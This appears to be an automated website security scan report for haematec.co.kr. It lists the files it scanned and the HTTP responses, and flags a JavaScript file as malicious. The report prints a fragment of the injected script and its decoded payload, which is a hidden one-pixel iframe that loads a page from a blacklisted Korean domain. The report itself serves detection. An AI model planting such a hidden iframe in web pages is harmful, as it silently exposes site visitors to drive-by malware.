Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haematec.co.kr
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haematec.co.kr/ | 200 OK Content-Length: 5788 Content-Type: text/html | clean |
https://cdn.adf.ly/js/entry.js | 200 OK Content-Length: 2813 Content-Type: application/x-javascript | clean |
http://haematec.co.kr/korean/images/flash/url.js | 200 OK Content-Length: 3510 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: oldcake.co.kr
function FlashMainbody(Ftrans,wid,hei) {
mainbody = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width='"+ wid +"' height='"+ hei +"'>";
mainbody += "<param name='movie' value='"+ Ftrans +"'>";
mainbody += "<param name='quality' value='high'>";
mainbody += "<param name='wmode' value='transparent'
...[3025 bytes skipped]...
Decoded script:
<iframe src='http://oldcake.co.kr/Flash/Sound/view.html' width='60' height='1' frameborder='0'></iframe>
http://haematec.co.kr/korean/main/index.asp | 404 Not Found Content-Length: 1446 Content-Type: text/html | clean |
http://haematec.co.kr//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://haematec.co.kr/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://haematec.co.kr/english/main/index.asp | 404 Not Found Content-Length: 1447 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haematec.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 28 Jan 2015 02:19:35 GMT
Server: Microsoft-IIS/6.0
Content-Length: 5788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQDRDRS=GCDLJCAANEOGNJPAJBOGFEGC; path=/
X-Powered-By: ASP.NET
...5788 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: haematec.co.kr
Referer: http://www.google.com/search?q=haematec.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.